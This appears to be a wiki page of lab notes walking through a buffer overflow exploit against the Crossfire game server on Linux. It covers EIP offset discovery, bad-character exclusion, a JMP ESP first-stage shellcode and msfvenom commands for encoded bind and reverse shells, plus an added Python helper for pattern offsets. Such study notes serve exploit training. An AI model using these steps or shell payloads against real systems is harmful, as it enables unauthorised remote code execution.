Linux Buffer Overflow
lethanhtung01011980 edited this page Dec 5, 2019 · 19 revisions
- EIP => JMP ESP => ESP containing payload
- In Crossfire: EIP => JMP ESP => EAX + 12 bytes containing payload
- Bad characters to exclude from the payload: 0x00 (Null)
- 0x0A (New Line '\n')
- 0x0D (Carriage Return '\r')
- 0x20 (ASCII Space)
- Evan's Debugger (edb): edb --run /usr/games/crossfire/bin/crossfire
- Click RUN twice to run
- The exact steps depend on the program
- /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4379
- /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4379 -q 46367046
- Run the attacking payload
- EDB > Plugins > OpcodeSearcher > Opcode Search > ESP -> EIP (finds a JMP ESP address)
- /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
- nasm > add eax,12
- 00000000 83C00C add eax,byte +0xc
- nasm > jmp eax
- 00000000 FFE0 jmp eax
Hence the payload needs \x83\xc0\x0c\xff\xe0 (add eax,12; jmp eax) as a first stage to jump 12 bytes past EAX.
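Added example, not from the original page: a Python reimplementation of what pattern_create.rb and pattern_offset.rb above compute, plus a check for the bad characters listed above, useful for crash triage. The length 4379, the EIP value 46367046 and the first-stage bytes are the page's; the function names are assumptions.

```python
import itertools
import string

# Bad characters listed on this page: NUL, LF, CR, space.
BAD_CHARS = b"\x00\x0a\x0d\x20"


def pattern_create(length: int) -> str:
    """Cyclic pattern in the same order as pattern_create.rb:
    Aa0Aa1...Aa9Ab0... (upper, lower, digit; the digit cycles fastest).
    Every 4-byte window is unique, so the register value identifies the offset."""
    chunks = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, eip_hex: str) -> int:
    """Offset of the 4 pattern bytes that ended up in EIP (what pattern_offset.rb -q does).
    The debugger shows the register value (e.g. 46367046); x86 is little-endian,
    so the bytes are reversed to recover the substring ("Fp6F"). Returns -1 if absent."""
    needle = int(eip_hex, 16).to_bytes(4, "little").decode("ascii")
    return pattern.find(needle)


def bad_chars_present(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return [(index, byte), ...] for every bad character found in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    pat = pattern_create(4379)                      # same length as on the page
    print("EIP offset:", pattern_offset(pat, "46367046"))   # -> 4368
    stage1 = b"\x83\xc0\x0c\xff\xe0"                # add eax,12 ; jmp eax
    print("bad chars in stage 1:", bad_chars_present(stage1))  # -> []
```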
- We updated our script to JMP ESP.
- Before running crossfire, put a breakpoint at the JMP ESP address.
- EIP is pointing at 0x08134596 as expected. It is a JMP ESP.
- Press F8 (Step over) to execute the JMP ESP at the EIP address. The program will execute the first-stage shellcode to jump to EAX + 12 (0xc is 12 in decimal).
- Step over again to see that EAX now points at AAAAAAAAA… as expected. "Setup sound" is removed.
- Shell bind tcp:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
- Reverse shell payload:
msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai